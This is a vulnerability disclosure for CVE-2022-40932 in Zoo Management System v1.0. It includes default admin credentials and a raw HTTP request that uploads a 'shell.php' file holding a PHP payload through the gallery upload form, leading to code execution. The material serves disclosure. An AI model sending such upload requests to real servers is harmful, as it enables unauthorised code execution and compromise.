Headline
CVE-2022-40932: Bug_report/RCE-1.md at main · lime-10010/Bug_report
In Zoo Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of the “gallery” file of the “Gallery” module in the background management system.
Permalink
Cannot retrieve contributors at this time
Zoo Management System v1.0 by pushpam02 has arbitrary code execution (RCE)
BUG_Author: Lime
Admind login account: [email protected]/Password@123
vendor: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html
Vulnerability url: http://ip/ZooManagementSystem/admin/public_html/gallery
Loophole location:There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the “gallery” file of the “Gallery” module in the background management system
Request package for file upload:
POST /ZooManagementSystem/admin/public_html/gallery HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.1.19/ZooManagementSystem/admin/public_html/gallery Cookie: PHPSESSID=5d10vq7lgptbau7foskstiug7i Connection: close Content-Type: multipart/form-data; boundary=---------------------------29223726215286 Content-Length: 330 -----------------------------29223726215286 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream JFJF <?php phpinfo();?> -----------------------------29223726215286 Content-Disposition: form-data; name="submit_image" -----------------------------29223726215286–
The files will be uploaded to this directory \ZooManagementSystem\img\gallery\image
We visited the directory of the file in the browser and found that the code had been executed